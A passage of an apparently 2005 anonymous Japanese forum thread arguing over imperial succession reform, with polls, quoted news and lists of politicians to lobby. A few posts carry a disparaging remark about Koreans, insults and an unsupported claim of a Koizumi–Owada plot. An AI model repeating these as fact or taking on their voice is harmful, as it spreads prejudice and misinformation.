230 :名無しさん@6周年:2005/11/19(土) 07:16:00 ID:QTVC/O180
小泉が大統領型を目指しているとしたら、致命的に失敗するだろう。
ヒトラーの善政が悪政に転じたような、転落をする。
というのは、これは心の問題だから。

被差別者からの票取りにするなら、朝鮮人にすべてくれてやるようなもん。
被差別意識をもっていない、サイレントマジョリティの真の国民からは
すさまじい憎悪をくらう。

皇室問題と牛肉問題では、ふざけたことしたら絶対に許さない。

231 :名無しさん@6周年:2005/11/19(土) 07:40:11 ID:Lq6nD8gh0
"有識者会議"は解散すべき、と政治家は言ってくれ。
こんなでたらめを通すだけで禍根が残る。人としてでたらめ過ぎる。

232 :名無しさん@6周年:2005/11/19(土) 07:51:45 ID:MbLoBzBT0
>>226
覚えておこう。落とす。
選挙が来たら、公認するな運動を巻き起こすか。

233 :名無しさん@6周年:2005/11/19(土) 08:02:24 ID:Qh/EhN1i0
サイレントマジョリティを馬鹿にするなってんだ>大前
貴様ら政治家が目に付いたちゃらちゃらしたところにばかり配慮しているから
日本国の本命たる団塊ジュニア世代がめちゃくちゃになってるんだ。
いいかげん理解しろよ。さもなくば目につかないところに消えうせろ。

234 :名無しさん@6周年:2005/11/19(土) 09:10:16 ID:wIT/b0fE0
>>226
>>232
短絡的になってはいけない。
大野議員のホームページ
http://oomae.jp/rinen.html
http://oomae.jp/index.html
を見ると
「【2】安定した立憲君主国家へ
わが国も、世界最古の歴史を有し、私たちの誇りである皇室の存在を
十分に生かした立憲君主国家として、 発展をめざすべきだと思います。」
「「『道徳』を正式教科に」
わが国における戦後教育の最大の欠陥は、・・・「徳育」を欠いていること」
と書かれている。
 考え方は保守だが、
男系継承の重要性(大野議員は、欧州の女王などとの違いをよくわかっていない)や、
旧宮家の皇籍復帰が決して無理なではない事をよくわかっていないだけだと思う。

「やむなし」とは言っているだけなので、
むしろもっときちんと認識してもらうためメールなどでうったえるべきとおもう。

235 :名無しさん@6周年:2005/11/19(土) 09:26:15 ID:sw5TSYnG0
>>230 :名無しさん@6周年:2005/11/19(土) 07:16:00 ID:QTVC/O180
>小泉が大統領型を目指しているとしたら、致命的に失敗するだろう。
>ヒトラーの善政が悪政に転じたような、転落をする。
>というのは、これは心の問題だから。

ヒトラーが誕生したのは、また別の理由からでしょう?
日本は海洋国であることを貫いていたら
ヒトラーみたいな独裁者は誕生しないと思う。

236 :名無しさん@6周年:2005/11/19(土) 09:28:53 ID:AEB/Nd420
>>235
小泉や将来の独裁者のことをヒトラーとか言ってるのではなくて、
評価の暗転をそう呼んでいるの。ヒトラーは1943年ぐらいまではリアル救世主だったから。

237 :名無しさん@6周年:2005/11/19(土) 09:30:56 ID:Aimwbhfy0
天皇陛下に断り無く国璽を用いているという情報が出て来ている。
これが事実なら僭主も同然。

238 :名無しさん@6周年:2005/11/19(土) 10:37:12 ID:bYmtdbh+0
石川嘉延静岡県知事に続け!
各都道府県知事に女系反対のメル凸を!

ttp://www.angelfire.com/journal2/hikojuro/tiji.html

239 :名無しさん@6周年:2005/11/19(土) 11:40:28 ID:aUJujJxV0
とりあえずお勧めの本でも貼っておく

「皇統断絶 〜女性天皇は、皇室の終焉〜」
中川八洋 ビジネス社 税込1,680円
四六判270p ISBN 4-8284-1190-9
ttp://www.amazon.co.jp/exec/obidos/ASIN/4828411909/
ttp://bookweb.kinokuniya.co.jp/guest/cgi-bin/wshosea.cgi?KEYWORD=%8d%63%93%9d%92%66%90%e2
ttp://www.bk1.co.jp/product/2552514
ttp://www.7andy.jp/books/detail?accd=31530215

240 :名無しさん@6周年:2005/11/19(土) 13:07:14 ID:EDjMalNx0
後継者問題起こる ← 現在
反対派への弾圧(安政の大獄) (もうすぐ)
桜田門外の変 (2年後)
禁門の変 (6年後)
長州征伐 (8年後)
明治維新 (10年後)

今から10年で政府が倒れるぞ

241 :名無しさん@6周年:2005/11/19(土) 13:28:09 ID:wp1ZwvS20
>230
「絶対ゆるさん」って、牛肉と皇室は同じレベルかw
子鼠首相は、お前に許してもらわなくても別にかまわんってさ。


242 :名無しさん@6周年:2005/11/19(土) 13:31:58 ID:yAtep6gp0
>>234
大野じゃなくて大前だね。

243 :名無しさん@6周年:2005/11/19(土) 13:37:41 ID:wIT/b0fE0
>>242
指摘サンクス。

<訂正版>
>>226
>>232
短絡的になってはいけない。
大前繁雄 衆議院議員のホームページ
http://oomae.jp/rinen.html
http://oomae.jp/index.html
を見ると
「【2】安定した立憲君主国家へ
わが国も、世界最古の歴史を有し、私たちの誇りである皇室の存在を
十分に生かした立憲君主国家として、 発展をめざすべきだと思います。」
「「『道徳』を正式教科に」
わが国における戦後教育の最大の欠陥は、・・・「徳育」を欠いていること」
と書かれている。
 考え方は保守だが、
男系継承の重要性(大野議員は、欧州の女王などとの違いをよくわかっていない)や、
旧宮家の皇籍復帰が決して無理なではない事をよくわかっていないだけだと思う。

「やむなし」とは言っているだけなので、
むしろもっときちんと認識してもらうためメールなどでうったえるべきとおもう。

244 :名無しさん@6周年:2005/11/19(土) 15:49:20 ID:4cmff0Vo0
>>240
よし、10年後に備えて今から実践訓練つむためのちょっくらイラク言ってくるかな。

日本人の拉致の報道が流れても、あいつは政府に迷惑をかけるのを嫌ってた、見捨ててくれって言ってくれ。

245 :名無しさん@6周年:2005/11/19(土) 15:56:47 ID:VnVtCho50
中共、南北朝鮮、アメリカがどんなに望んでも手に入らない
「桁違いの歴史の重み」が皇統にはある。
こいつらに馬鹿にされたくなければ男系維持、皇統存続を主張するべき。

246 :名無しさん@6周年:2005/11/19(土) 15:59:58 ID:4cmff0Vo0
というか女系になった時点で、皇統断絶⇒三種の神器争奪戦。

さぁ日本、頑張れ。先進国からの介入もあるだろうな。200年後日本という国は存在してるかな・・・?

247 :名無しさん@6周年:2005/11/19(土) 16:28:09 ID:pI0exCr70
旧宮家復活させろや 上げ

248 :名無しさん@6周年:2005/11/19(土) 17:45:04 ID:UZA6Uzg30
1億5250万もの持参金の出所は、やっぱ国民の血税?

249 :名無しさん@6周年:2005/11/19(土) 17:46:21 ID:LiBsolj30
「男系派はいいかげん腹くくれ」は過激な煽りみたいだけど正論。
「女帝」といわず「女性天皇」と言葉をやわらかくし、
「女系天皇」という新語をつくって、認めるべきか否かなんて踏み絵。

皇位は皇族男子が継承する、でいいじゃないか。
皇位につかない皇族男子は、その藩屏として皇室を支える。
それが皇族男子のつとめ。それを変える必要など全くない。

昔は女帝もいたじゃないかという人には、皇位継承者が幼少である場合に、
最適の皇胤の女子が臨時代行をつとめていたのだと原則を確認させたらいいし、
女が男に劣るのか?という女帝論者には、劣るのではないから皇胤の女子に
代行させられるのであって、劣るのなら後胤ではない男子が代行できたはず。
そう言えばいいのではないかと思う。

時代が変わったと言うのなら、そういう後胤の女子の代行する時代は古代で、
もうそのような時代は終わったと言えばいい。
その後は江戸時代に後桜町天皇の一例があるだけだから、それが、宮家から
皇位を継承した光格天皇の養母でもあったということを言ってもいい。
(明正天皇は後水尾天皇の幕府に対する政治的な抗議声明だから別の話)。

ともかく、皇族男子は現在でも何人もいるのだし、占領政策で外された
旧宮家を復帰させれば「皇位継承資格のある男子がいなくなる」とか、
「皇位継承資格のある男子が幼少だ」ということもないのだから、
臨時代行者である女帝を、代行者ではない天皇として無原則で即位させる
などいう「歴史上に全く無かったこと」を法制化する理由は全くない。
皇位は皇男子孫これを継承す、これを変えてはいけないと思う。

250 :名無しさん@6周年:2005/11/19(土) 18:23:39 ID:J4688ttNO
逆転の発想はどうだろうか?
太上天皇(皇父)は皇族以外は認めない、とすればどうだ?

251 :名無しさん@6周年:2005/11/19(土) 18:28:16 ID:9f6ysz+L0
>>248

女系容認で結婚しても皇族ならそんな額ではすまないぞ。
安く上げるなら女系反対でなくちゃ。

252 :名無しさん@6周年:2005/11/19(土) 18:28:27 ID:ys8dXdwG0
なるほど、女系天皇が即位しても
血統的に正統な元皇族を担いで日本転覆を企むヤシが
出るかも、ってことか。
おいおい、今は何時代だよ?
とは思うが、心情的には男系を応援したいなぁ。

253 :名無しさん@6周年:2005/11/19(土) 18:41:39 ID:vRgpfJNM0
女性天皇を認める場合にその女帝が敬宮という仮定ありきなのがそもそもわからん。

>>182
>秋篠宮即位→「中継ぎ」で愛子天皇(女性皇族)即位→息子即位(男系男子)

秋篠宮が即位したら「中継ぎ」に敬宮がくるのはおかしいでしょ?
男系維持と言ってる人ですら有識者会議の「まず愛子天皇ありき」に洗脳されかけてないか?
別にそうじゃない、男系なら直系優先なんだっていうなら謝るけど。

254 :名無しさん@6周年:2005/11/19(土) 19:51:45 ID:vShE9DIM0
>>1見ると大前とか日本会議メンバーでも女系支持の奴いるんだな。
前どっかのスレで二百三十八人全員が女系反対であるかのように書
いてた奴いたがあれはデマだったのか。


255 :名無しさん@6周年:2005/11/19(土) 20:32:51 ID:9f6ysz+L0
>>253

直系長子優先に変えるから当然敬宮が女帝になる。


256 :名無しさん@6周年:2005/11/19(土) 20:41:37 ID:uoywwcn30
【保存】愛子様の子供から見た系譜
色を付けてわかりやすくしてみました。

http://www.xxxx.nu/upload/upload/nabi/uppp17666.jpg
http://kago-ai-chan.net/uploader/img/naver5121.jpg
(リンクが切れる場合があるので保存してください)

それを色々なスレッドや別サイトの掲示板にコピーしたり(勿論ルール内の範疇)、
身近な人に見せたりと、この問題の重要性を広く知らせてください。


 女系系譜      皇統        男系系譜
 
 由美子母      昭和天皇      夫の曾祖父
   \         │        / 
  小和田由美子   天皇陛下    夫の祖父
      \      │      / 
      雅子様  皇太子殿下  夫の父
         \  /     /
          愛子様   愛子様の夫
            \   /
             お子様

愛子様が民間人と結婚し、間に生まれた子供は、父系は
愛子様の夫の男系で、母系は雅子様の母の系統でどっちを
見ても皇統ではない。



257 :名無しさん@6周年:2005/11/19(土) 20:45:08 ID:XglzHnH00
>>255
秋篠宮が即位して、秋篠宮の内親王に男系の男子ができれば
そちらが優先されないか?
(最後の)天皇からみての直系だろ?

258 :名無しさん@6周年:2005/11/19(土) 20:48:50 ID:9f6ysz+L0
>>257

 今の皇太子が天皇に即位してその直系といえば愛子しかいない。

259 :名無しさん@6周年:2005/11/19(土) 20:51:50 ID:dFTDrLxC0
八木の南北朝云々とかいう電波に説得力を感じてしまう稲田って
頭大丈夫なんだろうか…

260 :名無しさん@6周年:2005/11/19(土) 20:57:54 ID:XglzHnH00
>>258
今の皇太子の後に「秋篠宮が即位したら」の前提。
敬宮は秋篠宮の直系ではない。

261 :名無しさん@6周年:2005/11/19(土) 20:59:03 ID:LiBsolj30
>>253
>男系維持と言ってる人ですら有識者会議の「まず愛子天皇ありき」に洗脳されかけてないか?

その心配はわかるけど、まぁ大丈夫だろう。
それより、「まず愛子天皇ありき」の人には「愛子様を押しのけて旧宮家なんて!」と
思い切り先走った短絡的な感情論を言うのがいるから、そういうのには
「秋篠宮様を押しのけて何で愛子様だと言えるんだ?」と聞くと良い。

262 :名無しさん@6周年:2005/11/19(土) 21:00:13 ID:ma709eV6O
>>259
中傷、レッテル張り乙。


263 :名無しさん@6周年:2005/11/19(土) 21:13:59 ID:J5RKRU3x0
女性・女系天皇をごっちゃにしてはいけない。

「愛子天皇は男系女性天皇」

ここまでは何の問題もない。
問題はその次。

「愛子天皇の息子の子が天皇になったら、何系天皇ですか?」

有識者会議はなんと答えるつもりなんですかね?

264 :253:2005/11/19(土) 21:16:45 ID:vRgpfJNM0
>>261
レスどうもです。最近この問題のスレを見始めたんだけど、
男系女子はいいけど女系はダメという話の時に「愛子天皇には誰も反対してない。その子供の話だ」と
いう論調が多かったのに違和感を覚えたので。

>「秋篠宮様を押しのけて何で愛子様だと言えるんだ?」
これに尽きる。

265 :名無しさん@6周年:2005/11/19(土) 21:26:27 ID:AJ+4R4lc0
>>263
女系ですとかいいそうだなw

マジで無識者w

今までで一番この言葉が似合うやつ等

「逝ってよし」

266 :名無しさん@6周年:2005/11/19(土) 21:37:28 ID:4YX7oysX0
天皇家の事なんだから、他人がごちゃごちゃ言わずに、今上が決めれば良いと思う。
今上が男系でと言えば、国民も大多数は納得するだろうし、女系で良いならそれも運命。
大体自分ちの事を人に決められて、嬉しい人なんて居ないでしょう。


267 :名無しさん@6周年:2005/11/19(土) 22:00:36 ID:bSI/l1Il0
こっちもあげておくか。


268 :名無しさん@6周年:2005/11/19(土) 22:14:18 ID:79z+s8o1O
国民の理解をーとかいう以前に、そもそも国民に理解を求める必要があるんかいな
これに興味ある国民ってどれだけいるんだ。周りは皇室なんてどうでもええわって人ばかりだが
アンケートみてもあんまり皇位継承の問題点とかぴんときてない人がほとんどくさいし
でもそんなん昔からだろうし。特にこんな平和なときには天皇はさして大きな存在でもあるまい
皇室のことは皇室周辺で決めればいいのに

269 :名無しさん@6周年:2005/11/19(土) 22:19:07 ID:xVXbKpkQ0
これは天皇家の事では無い
皇位継承は天皇さえ変えられないもの
男系継続が一番問題が少ないという事

270 :名無しさん@6周年:2005/11/19(土) 22:49:43 ID:9f6ysz+L0
>>260
>今の皇太子の後に「秋篠宮が即位したら」の前提。

だから、男系の男子でなく、男系の子孫(男性・女性を問わない)
としたら、現皇太子の次はその長子の敬宮になる。
女性天皇容認で敬宮天皇は実現する。次にその敬宮の子を天皇に
 するのを「女系」といってるようだよ。

271 :名無しさん@6周年:2005/11/20(日) 00:44:49 ID:BVkNhkWZ0
>>255 >>270
「現皇太子即位→秋篠宮即位」としている時点で >>182の三、四は
「直系長子優先にならない場合」のパターンを想定しているわけでしょう。
それなのに秋篠宮→敬宮というのはおかしいというのが発端なのだから
>男系の男子でなく、男系の子孫(男性・女性を問わない)としたら
という指摘は筋違い。

あくまで >>160 >>182 にある男系維持のパターン4例を前提にした話なんですから。


272 :名無しさん@6周年:2005/11/20(日) 02:44:02 ID:IeNKfDzl0
なんにしろ、
>>160、182はピントがずれてないか?

男系維持のパターンを考えるとすれば、

1.どの範囲の旧皇族の人々を復帰させるか
2.どういう形で復帰させるのか(養子か新宮家相続か)
3.皇位継承順をどうするのか
4.男系女子の皇位継承を認めるのか
の検討が必要(他にもあるかも)。

>>160、182は1.2.の検討はないし、細かく考えすぎ。


273 :名無しさん@6周年:2005/11/20(日) 03:26:55 ID:IYm7q58N0
秋篠宮即位の次にあり得るのは愛子様ではなく眞子様でしょ

これは傍系移行時の特例として
皇室典範の改正案として出さねば

274 :名無しさん@6周年:2005/11/20(日) 03:40:25 ID:ECBWrPf4O
秋篠宮様、なんか可哀想。東宮さまには悪く言われ、継承順位は剥奪みたいな扱いされてさ。次男坊はあっちいってろってか。最低だな、愛子さま優先派は。

275 :名無しさん@6周年:2005/11/20(日) 04:08:20 ID:hBwloonO0
【調査】女性・女系天皇容認「賛成」77%で、「反対」6%を大きく引き離す
http://news19.2ch.net/test/read.cgi/newsplus/1130957564/
・調査で小泉純一郎首相の私的諮問機関「皇室典範に関する有識者会議」(吉川弘之座長)が
 「女性・女系天皇」を容認する方針を打ち出したことへの意見を聞いたところ、「賛成」が77%と
 「反対」の6%を大きく引き離した。
 現制度は「男系男子」に限って皇位継承を認めてきた。調査結果を見る限り「女性天皇」
 母方が天皇の血筋を引く「女系天皇」のいずれも世論の抵抗は小さいようだ。
 ※ソースは日経新聞05.11.02朝刊

★7割超が女系天皇容認=皇位継承「男女同等に」8割弱−時事世論調査
http://news19.2ch.net/test/read.cgi/newsplus/1118989320/
・時事通信社が17日まとめた皇位継承方法に関する世論調査結果によると、
 7割以上が現行の男系継承(父方が皇族)について「こだわる必要はない」と、
 母方のみが天皇の血筋を引く女系天皇を容認していることが分かった。
 また、女系容認の場合の皇位継承方法に関しても「男女で差をつける必要は
 ない」との回答が8割近くに上った。
 政府の「皇室典範に関する有識者会議」では、前例がない女系天皇を容認
 するかが焦点となっており、女系容認の世論動向は今後の論議に影響しそうだ。

10月28日付・読売社説(1)
[女性天皇]「有識者会議の結論を尊重したい」
http://www.yomiuri.co.jp/editorial/news/20051027ig90.htm

http://www.sankei.co.jp/news/morning/19pol001.htm
 ■首相懇談要旨■
 【皇室典範改正】(皇室典範に関する有識者会議は)もう何回もやっているから。
来年の通常国会に提出する準備を進めている。(国民各層の)理解は得られると思っている。

女系天皇容認、議論見守る=安倍官房長官
http://headlines.yahoo.co.jp/hl?a=20051117-00000062-jij-pol

276 :名無しさん@6周年:2005/11/20(日) 07:55:01 ID:aSv5sfAl0
なんだ、この笠原ってやつ。>フジ
結局こんなやつか。皇太子殿下に敬称も付けられないやつだったのかw

277 :名無しさん@6周年:2005/11/20(日) 07:59:00 ID:AyQSLXaz0
◆◆愛子ちゃん天皇はこんなに危うい! これを見れば一発で分る図◆◆

愛子天皇+『 皇婿 』←愛子様と結婚すれば誰でも得られる『 地位 』
              (上手く男子が出来れば天皇の父親=狙ってる輩が!)
               ※万世一系の皇統はここで断絶します
○○天皇+愛子皇后
 ↑
皇位継承権資格のある男系男子のみ許される『 地位 』
誰でもはなれない⇒旧宮家男子しかいない

◇ベストシナリオ◇

第125代天皇 今上陛下・皇后陛下(美智子様)
第126代天皇 皇太子殿下・妃殿下(雅子様)
第127代天皇 秋篠宮殿下・妃殿下(紀子様)
第128代天皇 旧宮家男子・妃殿下(愛子様or眞子様)
第129代天皇 128代両陛下のお子様男子

278 :名無しさん@6周年:2005/11/20(日) 08:03:58 ID:4o5cH0xW0

 側室?
 ひげの基地外皇族、
 一般大衆の神経を逆なでしちゃったね。

 それはともかく、
 天皇マニアのみんなの特殊な性癖が、
 一般大衆に認めてもらえるといいね。
 まあ無理だろうけど。

279 :名無しさん@6周年:2005/11/20(日) 08:34:43 ID:hBwloonO0
【調査】女性・女系天皇容認「賛成」77%で、「反対」6%を大きく引き離す
http://news19.2ch.net/test/read.cgi/newsplus/1130957564/
・調査で小泉純一郎首相の私的諮問機関「皇室典範に関する有識者会議」(吉川弘之座長)が
 「女性・女系天皇」を容認する方針を打ち出したことへの意見を聞いたところ、「賛成」が77%と
 「反対」の6%を大きく引き離した。
 現制度は「男系男子」に限って皇位継承を認めてきた。調査結果を見る限り「女性天皇」
 母方が天皇の血筋を引く「女系天皇」のいずれも世論の抵抗は小さいようだ。
 ※ソースは日経新聞05.11.02朝刊

★7割超が女系天皇容認=皇位継承「男女同等に」8割弱−時事世論調査
http://news19.2ch.net/test/read.cgi/newsplus/1118989320/
・時事通信社が17日まとめた皇位継承方法に関する世論調査結果によると、
 7割以上が現行の男系継承(父方が皇族)について「こだわる必要はない」と、
 母方のみが天皇の血筋を引く女系天皇を容認していることが分かった。
 また、女系容認の場合の皇位継承方法に関しても「男女で差をつける必要は
 ない」との回答が8割近くに上った。
 政府の「皇室典範に関する有識者会議」では、前例がない女系天皇を容認
 するかが焦点となっており、女系容認の世論動向は今後の論議に影響しそうだ。

10月28日付・読売社説(1)
[女性天皇]「有識者会議の結論を尊重したい」
http://www.yomiuri.co.jp/editorial/news/20051027ig90.htm

http://headlines.yahoo.co.jp/hl?a=20051119-00000003-san-pol
 ■首相懇談要旨■
 【皇室典範改正】(皇室典範に関する有識者会議は)もう何回もやっているから。
来年の通常国会に提出する準備を進めている。(国民各層の)理解は得られると思っている。

女系天皇容認、議論見守る=安倍官房長官
http://headlines.yahoo.co.jp/hl?a=20051117-00000062-jij-pol

280 :名無しさん@6周年:2005/11/20(日) 08:46:46 ID:1jYCn8p80
TBSの世論調査では
「皇室典範の改正には天皇、皇室の考えを聞くべき」が76%

天皇陛下ノルウェーご訪問に際し ご会見年月日: 平成17年4月25日 
http://www.kunaicho.go.jp/kisyakaiken/kisyakaiken-h17norway-01.html
問3 「・・・各国の王室では,一つの例として,男女平等に王位を継承できる動きが
広がるなど,時代とともに変化してきております。今後の皇室を考えていく上で,
これまでの欧州の各王室とのご交際の中から参考になることなどがありましたら
お聞かせください」

に対する天皇陛下のご回答
「・・・私は日本の皇室については過去の日本を振り返り(*1),
私どもがこれまでに経験してきたことを基に(*2),
国民と心を共にすることを念頭に置きつつ,
望ましい在り方を求めていきたいと思っています。 」

 (*1)日本の皇室については過去の日本を振り返り
  → 日本の皇室は、日本の歴史と伝統(皇統は男系)を重視 と読める。
 (*2)私どもがこれまでに経験してきたことを基に
  → 皇室の過去の皇位継承例(傍系男系男子継承、緊急避難で女帝)を基に と読める。

寛仁親王殿下の「女系天皇に異論」のエッセイでは、
「 ”陛 下 や 皇 太 子 様 ”は、
御自分達の家系の事ですから御自身で、発言される事はお出来になりません」
とある。

海外になるが、去年か今年の始めに”ドイツ紙?で、
「天皇陛下は男系継承維持希望で保守的」といった様な記事が出た事があるが、
今ふり返るとこれは本当のことだったのだろうと思う。

281 :名無しさん@6周年:2005/11/20(日) 08:48:38 ID:AN9GR4dKO
292:名無しさん@6周年 2005/11/02 21:41:31 POHENv0B0
>>1
> 現制度は「男系男子」に限って皇位継承を認めてきた。調査結果を見る限り「女性天皇」 
>  母方が天皇の血筋を引く「女系天皇」のいずれも世論の抵抗は小さいようだ。 

> 「男女を区別せず第一子を優先する」(44%)
> 「兄弟姉妹の間では男子を優先する」(42%)がほぼ並んだ。
> 「言えない・わからない」も14%あった。

女系についての説明がなされてないし、理解されてない、知らない証拠じゃん。
過去にも居た「女性天皇」、愛子様〜な回答している人が多数なのにこれ如何に。

> 「男女を区別せず第一子を優先する」(44%)
> 「兄弟姉妹の間では男子を優先する」(42%)がほぼ並んだ。

愛子様が皇位を継承されてもいいじゃないと回答したのに、マスコミは「女性・女系」と
報道するという。この乖離、ミスリード。


282 :名無しさん@6周年:2005/11/20(日) 08:52:35 ID:rzaK83ke0
愛子様をどうしても天皇の位に祭り上げたい勢力による政治工作だな。
小泉と小和田家は繋がっている。

283 :名無しさん@6周年:2005/11/20(日) 08:55:24 ID:AN9GR4dKO
>>279
女性天皇賛成か反対かは有るが、男系維持に賛成かなんて無いから。
税金、年金と違い、この手の問題は、
天皇陛下や国会が示せば、大抵が容認に成る。
だから、天皇に何も意見を言うなと必死に成る。雅子様や愛子様が嫌と言えば一発だね。
氏族と言うか家庭の在り方だから、総理に女性が成れるとかと違い、
一般にも養子は有るので、普通に容認に成る。だから皇族に意見を言うなと女系強要派は必死に成る。
テレビも寛仁親王の養子の表現を、一般に良く有るので避けたりしてる。
あと、TBSの調査では国民の八割近くが天皇、皇室から意見を聞くべきと答えてます。

と言うか、聞き方が悪いね。
それだと、他に方法が無いみたいで、天皇制度廃止か女性天皇容認かの2択に成る。
養子など他の方法も有る事を提案しないといけないのに、
寛仁親王の養子方式などの表現をマスコミは無視。ワザトかな。
だから、女性、女系か解るようにでは無く、男系維持の方法や男系の意味を伝えるように主張しないと。
女系、女性天皇を認めないと、継承者が居ないと誤解されたり、2択に誤解されたりする。
あと、女系と言う表現が解りにくいから誤解される。単に愛子様の子がどうなるのとかね。
キチンと天皇系統とは別の系統に成る、別の氏族に纂奪されると説明するよう求めないと。
愛子様の子が女系程度の矮小化された認識だと意味が無い。


284 :名無しさん@6周年:2005/11/20(日) 08:56:07 ID:hBwloonO0
皇室典範会議の内幕 文藝春秋(2005月3月号) 

>天皇制の大転換点をめぐってカギを握るのは  奥野修司(ジャーナリスト)

>皇后との関係ということでいえば、聖心女子大の先輩である緒方
>貞子氏が筆頭にあげられるだろう。正田家とは古くからの付きあ
>いがあり、少女時代は軽井沢のテニス仲間だった。一昨年、天皇
>ご夫妻が十三年ぶりに軽井沢でダブルスを組まれたときの相手も
>つとめた。
>「うちうちに御所へ行くことも多く、皇后の相談相手の一人」(緒方氏の知人)
>といわれている。また天皇のご信頼も厚く、国連のアナン事務総
>長と会見したときに、彼女の様子を尋ねられている。緒方氏も
>《私が国連難民高等弁務官を務めていたときは、帰国するたびに
>報告に上がりました》(「文藝春秋」平成十五年十一月号)と書い
>ており、公私ともに天皇家の交流が深い存在といえよう。
> 国際的に活躍し、女性であり、かつ天皇家にも近いということ
>で、緒方氏の発言が会議で重きをなすだろうことは想像に難くない。

> 私がもっとも関心があるのは、皇族、とくに皇太子ご夫妻の
>ご意向がこの会議に反映されるのだろうか、という点にある。
>旧知の宮中関係者にそれを言うと笑われた。「あそこは陛下と
>皇太子さまの立場に天と地ほども差があって、陛下のお考えが
>すべてなんですよ」というわけである。
> 天皇が国政に関与すれば憲法違反になるから、政府は皇室典範
>改正に際して、天皇のご意向を聞くとは絶対に言わないだろう。
>だが永田町では「陛下のご意向なくして政府が動くはずがない」
>といわれている。
> 愛子さまが生まれたあと、天皇は「典範改正について自分が
>言っても仕方ないが、変える必要はあるだろう」と述べられたと
>伝えられる。
> 今回の有識者会議の設置自体が、こうした雰囲気に影響された
>可能性は充分にある。

285 :名無しさん@6周年:2005/11/20(日) 08:59:55 ID:hBwloonO0
国民の幸せを願い,力を尽くしていくという点では日本の皇室も欧州の王室も
一致しており,様々なことで共感を覚えます。

私は日本の皇室については過去の日本を振り返り,私どもがこれまでに経験してきたことを基に,
国民と心を共にすることを念頭に置きつつ,望ましい在り方を求めていきたいと思っています。

国民と心を共にすることを念頭に置きつつ,望ましい在り方を求めていきたいと思っています。
国民と心を共にすることを念頭に置きつつ,望ましい在り方を求めていきたいと思っています。
国民と心を共にすることを念頭に置きつつ,望ましい在り方を求めていきたいと思っています。
国民と心を共にすることを念頭に置きつつ,望ましい在り方を求めていきたいと思っています。
国民と心を共にすることを念頭に置きつつ,望ましい在り方を求めていきたいと思っています。
国民と心を共にすることを念頭に置きつつ,望ましい在り方を求めていきたいと思っています。
国民と心を共にすることを念頭に置きつつ,望ましい在り方を求めていきたいと思っています。
国民と心を共にすることを念頭に置きつつ,望ましい在り方を求めていきたいと思っています。
国民と心を共にすることを念頭に置きつつ,望ましい在り方を求めていきたいと思っています。
国民と心を共にすることを念頭に置きつつ,望ましい在り方を求めていきたいと思っています。
国民と心を共にすることを念頭に置きつつ,望ましい在り方を求めていきたいと思っています。
国民と心を共にすることを念頭に置きつつ,望ましい在り方を求めていきたいと思っています。
国民と心を共にすることを念頭に置きつつ,望ましい在り方を求めていきたいと思っています。
国民と心を共にすることを念頭に置きつつ,望ましい在り方を求めていきたいと思っています。
国民と心を共にすることを念頭に置きつつ,望ましい在り方を求めていきたいと思っています。
国民と心を共にすることを念頭に置きつつ,望ましい在り方を求めていきたいと思っています。


286 :名無しさん@6周年:2005/11/20(日) 09:02:50 ID:hBwloonO0
ttp://blog.goo.ne.jp/nishidauritarou/e/bd569a8fe6bca6520da57a614983621d

2005年11月12日号の週刊現代に,
「皇室典範会議の決定に守旧派はどう動くか」と題する記事がある。
その内容は,驚くべきものである。
「本誌は八木氏に対し,
いまの天皇自身が,男系女系にこだわっていないのでは,と聞いた。
すると八木氏は,こう主張するのだった。
『この問題は,各時代の皇位についた方の考えを超えた問題です。
もし仮に,そういうお考えであれば,間違っていると思います。
天皇陛下の意見に左右される必要はありません』
平成17年9月5日に,「誰のための皇室論か。」という記事を書いたが,
まさか,本当にここまでの愚かさを露呈する論者がいたとは,
不思議というか何というか。

〜中略〜

ただ,もちろん,今上陛下が自らの意見を述べられることはないであろう。
この記事において,橋本明氏によれば,今上陛下が

「私の血筋に男女の差はないのだから,今後,女性が天皇になることに問題はない」

と述べられたとあるのだが,
これはもし万が一本当であったとしても内輪の話であったであろうし,
平成14年12月19日の記者会見において

「皇位継承の問題は皇室典範に定められており,この問題は国会の論議にゆだねられる問題と思います。」

と明言されておられるからだ。


287 :名無しさん@6周年:2005/11/20(日) 09:10:36 ID:r+bbikec0
◆◆愛子ちゃん天皇はこんなに危うい! これを見れば一発で分る図◆◆

愛子天皇+『 皇婿 』←愛子様と結婚すれば誰でも得られる『 地位 』
              (上手く男子が出来れば天皇の父親=狙ってる輩が!)
               ※万世一系の皇統はここで断絶します
○○天皇+愛子皇后
 ↑
皇位継承権資格のある男系男子のみ許される『 地位 』
誰でもはなれない⇒旧宮家男子しかいない

◇ベストシナリオ◇

第125代天皇 今上陛下・皇后陛下(美智子様)
第126代天皇 皇太子殿下・妃殿下(雅子様)
第127代天皇 秋篠宮殿下・妃殿下(紀子様)
第128代天皇 旧宮家男子・妃殿下(愛子様or眞子様)
第129代天皇 128代両陛下のお子様男子

288 :名無しさん@6周年:2005/11/20(日) 09:10:48 ID:AN9GR4dKO
橋本って言えば、同名に勝手に陛下の考えを捏造して嫌われて皇居に立ち入り禁止に成った人が居たな〜

その手の誘導、印象操作の工作ってキモいよね。


289 :名無しさん@6周年:2005/11/20(日) 09:12:13 ID:/dWFAZHh0
■女性・女系天皇反対、男系男子維持、旧宮家復籍すべしの突撃先(議員)■

安倍内閣官房長官 http://newleader.s-abe.or.jp/modules/contact/

神道政治連盟国会議員懇談会 http://www.sinseiren.org/ouen/kokugikon.html

自民党新人議員 http://www.powup.jp/jinken/list/

全国議員サイト http://gikai.fc2web.com/

国民新党 http://www.kokumin.biz/ ※ご意見箱に書込可

自民党本部 http://www.jimin.jp/
      〒100-8910 東京都千代田区永田町1-11-23
      TEL 03-3581-6211 FAX 03-5511-8855
      自民党本部・公聴室:03-3581-0111
      自民党に物申す:http://www.jimin.jp/jimin/main/mono.html
      新憲法制定推進本部:https://youth.jimin.or.jp/kenpou/index.html

首相官邸 http://www.kantei.go.jp/
     TEL 03-3581-0101
     ご意見募集 http://www.kantei.go.jp/jp/forms/goiken.html
     小泉内閣メールマガジン(首相メールマガジンの意見欄も直接首相に届く)
     http://www.kantei.go.jp/jp/m-magazine/index.html

内閣官房 内閣総務官室 「皇室典範 有識者会議」宛
     http://www.cas.go.jp/index.html
     〒100-8968 東京都千代田区永田町1-6-1
     TEL 03-5253-2111 FAX 03-3581-7238
     ご意見募集 http://www.iijnet.or.jp/cao/cas/jp/goiken.html

290 :名無しさん@6周年:2005/11/20(日) 09:13:50 ID:WbY98Fed0
■女性・女系天皇反対、男系男子維持、旧宮家復籍を公式表明せよの突撃先 ■

【神社本庁】http://www.jinjahoncho.or.jp/
      〒151-0053 東京都渋谷区代々木1-1-2
